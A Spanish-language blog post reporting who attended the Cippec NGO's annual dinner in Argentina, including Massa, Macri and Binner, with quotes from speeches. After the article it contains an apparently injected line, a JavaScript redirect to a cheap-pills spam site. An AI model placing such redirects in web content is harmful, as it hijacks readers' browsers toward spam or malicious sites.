Massa, el más requerido en la cena del Cippec

Tal vez por estrategia o por estar demorado en la autopista, como le contó a Ignacio de Mendiguren, Sergio Massa llegó tarde a la cena del Cippec, el último lunes. Pero la demora le dio resultado: fue el político más requerido en la cena anual de la ONG que se dedica a las políticas públicas y desbordó de presencia de primeras figuras y en la que muchas empresas se estiraron a $150.000 para pagar las mesas principales y ayudar a ese centro. Massa asistió con casi toda su tropa, desde Roberto Lavagna que inauguró su asistencia en un evento que lleva años, al mencionado Mendiguren que se felicitaba por discursos de tono desarrollista.
Muaricio Macri fue saludado con entusiasmo y su mujer, Juliana Awada, que optó por un conjunto minimalista, fue la elegida en distintas mesas como la más elegante de la noche. Los radicales también fueron en tropel, desde Ernesto Sanz y Jesús Rodrígeuz a Oscar Aguad y Ricardo Gil Lavedra.
Los socialistas concurrieron con Hermes Binner y Alicia Ciciliani a la cabeza. En cambio del ARI solo se vio a Fernando Sánchez.
Entre los empresarios se vio desde la cúpula del HSBC, a la mesa de enlace rural en pleno, a Gustavo Grobocopatel, Jaime Campos , Guillermo Stanley, Mario Quintana, Woods Staton, entre tantísimos otros. Había entusiasmo en las mesas. A tal punto que la conductora del evento, María O’Donnel tuvo que suplicar silencio, Las palmas se la llevaron dos discursos. “A veces se confunde la aspiración de una agenda estratégica con la demanda de uniformidad en las posiciones políticas”, dijo Fernando Straface. Y Eduardo Levi Yeyati, señaló: “El desarrollo nos elude porque si bien los ingredientes fundamentales están, no terminan de conjugarse adecuadamente ”.

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *